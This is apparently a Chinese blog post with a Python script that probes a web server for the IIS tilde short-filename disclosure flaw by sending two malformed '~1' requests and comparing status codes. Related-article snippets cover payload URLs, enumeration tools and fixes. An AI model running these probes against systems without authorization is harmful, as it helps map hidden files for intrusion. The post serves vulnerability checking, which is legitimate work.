IIS短文件名称漏洞验证

最新推荐文章于 2025-03-24 23:36:23 发布
原创 最新推荐文章于 2025-03-24 23:36:23 发布 · 204 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 

import requests

# 目标 URL(请替换为你的目标网站)
TARGET_URL = "http://target"  # 目标 IIS 站点

# 检测 IIS 短文件名漏洞的两个畸形请求
VULN_PATHS = [
    "/*~1*/a.aspx", 
    "/l1j1e*~1*/a.aspx"
]

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
}

def check_iis_vuln(url):
    """ 检测 IIS 短文件名漏洞 """
    try:
        responses = {}

        for path in VULN_PATHS:
            test_url = url.rstrip("/") + path
            response = requests.get(test_url, headers=HEADERS, allow_redirects=False)
            responses[path] = response.status_code
            print(f"[+] {test_url} -> Status Code: {response.status_code}")

        # 判断是否存在漏洞
        if responses[VULN_PATHS[0]] == 404 and responses[VULN_PATHS[1]] != 404:
            print("\n[!] 目标存在 IIS 短文件名信息泄露漏洞!")
        else:
            print("\n[-] 目标可能没有该漏洞。")

    except requests.exceptions.RequestException as e:
        print(f"[ERROR] 请求失败: {e}")

if __name__ == "__main__":
    check_iis_vuln(TARGET_URL)

Microsoft IIS短文漏洞验证测试
afei001
12-23 1990
目录 1.前言 2.漏洞原理 3.Microsoft IIS扫描器 4.漏洞验证 5.漏洞修复 1.前言 今天使用AWVS对目标网站进行漏扫时,发现了Microsoft IIS tilde directory enumeration漏洞,即常说的Microsoft IIS短文漏洞。 afei 短文漏洞请参考笔记:短文漏洞介绍及利用 漏洞等级: 获取非敏感信息文:中危; 可获取敏感信息(账号密码、数据库...):高危。 ...
iis短文漏洞
weixin_51387754的博客
12-22 3884
漏洞简述 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文和文名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文,并获取有关应用程序基础结构的信息。 漏洞复现 构造payload查看是否具有漏洞 http://www.target.com/~1***/a.aspx http://www.target.com/l1j1e*~1****/a.aspx 如果存在短文名泄露漏洞就会出现404页面
IIS短文名泄露漏洞验证
热门推荐
无名小菜的博客
06-05 1万+
在存在漏洞的页面进行抓包,在URL中提交a字母加通配符,若返回状态码404,说明文存在,如下图:在URL中提交3字母加通配符,返回状态码400,说明文不存在,如下图       在用burpsuit抓包时有时候会抓到带有cookie的字段的数据包,但是当构造发送包的时候需要将cookie字段删掉,若不删掉会一直返回404错误不会返回400.       攻击者可利用此漏洞枚举进行对网络服务器根...
IIS漏洞再现
最新发布
qq_64470109的博客
03-24 877
访问成功。
iis 短文名泄露 验证工具
06-25
iis短文名泄露,可以用这个工具校验, python 和JAVA版的都有
关于 IIS短文名泄露漏洞
zcfeng
11-11 7406
IIS短文漏洞修补
IIS短文漏洞
94小菜
10-25 5399
目录简介实验漏洞利用局限性修复建议参考链接 简介 IIS简介 Internet Information Services(IIS,以前称为Internet Information Server)互联网信息服务是Microsoft公司提供的可扩展Web服务器,支持HTTP,HTTP/2,HTTPS,FTP,FTPS,SMTP和NNTP等。起初用于Windows NT系列,随后内置在Windows 2000、Windows XP Professional、Windows Server 2003和后续版本一起发
IIS短文漏洞复现图文详解
09-29
IIS短文漏洞是一种信息安全问题,该漏洞允许攻击者通过特定技术手段,获取服务器上不应公开的文和文夹信息。在了解和防御这种漏洞之前,首先需要掌握相关的概念和技术背景。 首先,IIS是微软公司的Internet...
IIS短文漏洞利用工具
07-31
短文名在Windows操作系统中被用来兼容DOS时期的8.3文命名规则,即文件名由8个字符加上一个点,再加上3个字符的扩展名组成。在某些情况下,IIS可能会暴露这些短文名,这可能使攻击者能够访问或猜测出原本隐藏的...
IIS短文名泄漏漏洞利用工具下载
03-05
可利用IIS中间键.NET漏洞猜解网站目录或短文名,好不好用试了才知道
网络安全-IIS短文名枚举漏洞
lc545205的博客
04-03 2818
IIS-ShortName-Scanner下载链接: 提取码:5lcqpython版本的需要安装python27环境: 提取码:h2orjava版本的需要安装jdk环境: 提取码:jl58。
IIS短文名泄露漏洞
lchyz89的专栏
02-21 2111
Windows Server 2003 and Windows XP  若要禁用 8.3 名称创建所有 NTFS 分区上的,键入 fsutil.exe behavior set disable 8 dot 3 1 在命令提示符下,然后按 ENTER 键。 Windows 2000 and Windows NT    要禁用 8.3 名称创建所有 NTFS 分区上的,使用以下步骤: 重要 此
浅谈“IIS短文名泄露”
→_→
07-17 3187
一:漏洞名称IIS短文名泄露 描述: Internet Information Services(IIS,互联网信息服务)是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 Microsoft IIS在实现上存在文枚举漏洞,攻击者可利用此漏洞枚举网络 服务器根目录中的文。 危害:攻击者可以利用“~”字符猜解或遍历服务器中的文件名,或对IIS服务器中的.Net Framework进行拒绝服务攻击。 (注:此漏洞实际是由HTTP请求中旧DOS 8.3.
IIS短文泄漏漏洞修改_iis短文名泄露 怎么设置
2301_78416732的博客
04-11 1267
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
深入浅出之IIS短文漏洞
L_lemo004的博客
07-09 4772
一、 什么是IIS Internet Information Services(IIS,以前称为Internet Information Server)互联网信息服务是Microsoft公司提供的可扩展Web服务器,支持HTTP,HTTP/2,HTTPS,FTP,FTPS,SMTP和NNTP等。起初用于Windows NT系列,随后内置在Windows 2000、Windows XP Profe...
IIS短文猜解
浅笑996的博客
11-18 3360
1.IIS短文漏洞 Microsoft IIS 短文/文名称信息泄漏最开始由Vulnerability Research Team(漏洞研究团队)的Soroush Dalili在2010年8月1日发现,并于2010年8月3日通知供应商(微软公司)。微软公司分别于2010年12月1日和2011年1月4日给予答复下个版本修复。2012年6月29日,此漏洞公开披露(中危)。 此漏洞实际是由HTT...
IIS短文漏洞修复
qq_24851835的博客
06-08 1690
IIS短文漏洞解决办法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

暴走的YH

非常感谢大家的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值